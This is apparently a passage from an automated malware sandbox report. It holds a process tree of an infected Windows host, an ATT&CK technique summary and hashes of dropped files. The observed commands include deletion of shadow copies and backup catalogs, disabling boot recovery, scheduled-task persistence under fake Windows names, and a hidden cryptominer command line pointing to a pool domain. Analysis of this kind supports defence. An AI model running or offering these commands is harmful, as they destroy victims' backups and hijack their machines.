                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:9344
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 0
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:11236
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:11164
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                    wmic shadowcopy delete
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:9268
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                      vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                                                                                      PID:6124
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:6296
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                        vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                                                                                                        PID:10372
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:11152
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:4076
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:10744
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:10788
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:6904
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                notepad.exe
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:10752
                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:6008
                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:9696
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\A59D.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\A59D.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:388
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\Update.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\Update.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:7544
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Red1_.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Red1_.exe"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:388
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Clip_.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Clip_.exe"
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:4312
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:9296
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:8516
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                      PID:9048
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:11032
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                          PID:11024
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                            PID:9100
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:6824
                                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:9712
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:9812
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:9588
                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:9336
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                    PID:10876
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\VideoDriver.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\VideoDriver.exe"
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:7208
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                        PID:9884
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                          PID:5104
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:7972
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\A59D.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\A59D.exe"
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:8088
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                        ping 1.1.1.1 -n 1 -w 100
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                        PID:9080
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                        ping 1.1.1.1 -n 1 -w 900
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                        PID:10908
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:10040
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:8092
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:5804
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:9620
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:6600
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:6948
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:8348
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:10096
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:7996
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:4104
                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:11200
                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                                            MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:10396
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                            PID:10280
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:10304
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:10384
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:2212
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:8480
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5448
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:10264
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:4784
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:9160
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:9296
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A728.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\A728.exe
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:7248
                                                                                                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:5920
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                  schtasks.exe /create /tn "pMPJ0qJK7ldbbDGcqGnR5byf" /sc ONLOGON /tr "'C:\Users\Admin\Documents\LimitDisable.potx.payfast290\pMPJ0qJK7ldbbDGcqGnR5byf.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                  PID:7888

                                                                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                T1031

                                                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                T1089

                                                                                                                                                                                                                                                                                                                                                                                File Deletion

                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                T1107

                                                                                                                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                T1081

                                                                                                                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                T1018

                                                                                                                                                                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                                                                                                                Impact

                                                                                                                                                                                                                                                                                                                                                                                Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                T1490

                                                                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                  1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                  843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                  e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                  2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                  1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                  843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                  e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                  2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                  aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                  568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                  096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                  ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                  aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                  568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                  096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                  ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                  ce11de1000560d312bf6ab0b5327e87b

                                                                                                                                                                                                                                                                                                                                                                                  SHA1

